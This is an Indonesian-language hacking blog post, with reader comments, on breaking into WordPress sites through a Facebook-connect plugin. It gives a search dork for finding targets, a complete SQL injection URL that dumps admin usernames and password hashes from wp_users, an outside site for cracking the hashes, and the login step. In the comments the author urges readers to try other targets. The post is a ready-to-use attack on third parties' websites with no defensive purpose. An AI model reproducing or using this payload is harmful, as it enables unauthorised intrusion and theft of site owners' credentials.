| Filename | Exploit Wordpress Blogs |
| Permission | rw-r--r-- |
| Author | admin |
| Date and Time | 13.00 |
| Label | |
| Action |
Dork: inurl:"fbconnect_action=myhome"
Klik situs Targetnya
Sekarang ubah URL :
?fbconnect_action=myhome&userid=
Dengan URL ini :
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--
?fbconnect_action=myhome&userid=
Dengan URL ini :
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--
Sekarang keluar Username dan Password Admin.
Encrypt Password MD5 (Blowfish) dengan
Encrypt Password MD5 (Blowfish) dengan
http://hashchecker.de/find.html
Sesudah menemukan Passwordnya masuk ke halaman Page wp-admin atau wp-login.php
Sesudah menemukan Passwordnya masuk ke halaman Page wp-admin atau wp-login.php
4 komentar:
ane coba ya den :) moga bisa
den udah ane coba ehh tahap masuki url ini >> ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--
eh malah gak keluar tuh username nya den?
@bimo96
kalo gitu cari target lain tandanya gak bisa di hacking ... emg susah kalo nyari targetnya :D
baru newbie mohon bimbingannya
https://syaruni.blogspot.co.id/
Posting Komentar